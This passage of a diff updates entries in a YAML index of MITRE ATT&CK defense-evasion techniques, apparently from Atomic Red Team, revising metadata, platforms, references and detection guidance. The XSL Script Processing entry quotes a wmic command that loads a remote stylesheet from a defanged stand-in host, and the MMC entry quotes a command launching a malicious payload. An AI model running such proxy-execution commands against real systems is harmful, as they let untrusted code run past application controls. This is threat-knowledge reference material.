+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -15561,9 +15852,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -15620,8 +15910,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -15630,57 +15920,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -15698,29 +15942,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -15753,7 +16041,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -15781,8 +16069,6 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests:
     - name: Create a hidden file in a hidden directory
@@ -15863,42 +16149,7 @@ defense-evasion:
         name: sh
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -15907,6 +16158,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -15915,20 +16169,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -15985,6 +16270,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -15995,13 +16281,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -16060,11 +16345,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -16104,8 +16388,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -16113,13 +16399,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -16150,9 +16436,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -16213,7 +16496,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -16235,11 +16518,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -16306,8 +16588,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -16325,7 +16607,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -16428,12 +16709,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -16446,6 +16726,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -16482,17 +16763,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -16538,9 +16819,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -16578,7 +16856,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -16597,7 +16875,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -16628,7 +16905,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -16652,12 +16929,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -16741,7 +17016,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -16763,7 +17037,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -16797,12 +17071,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -16854,9 +17126,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges - MacOS
@@ -16983,7 +17254,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -17030,7 +17300,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -17043,12 +17313,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -17127,7 +17398,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -17149,7 +17420,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -17192,7 +17462,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
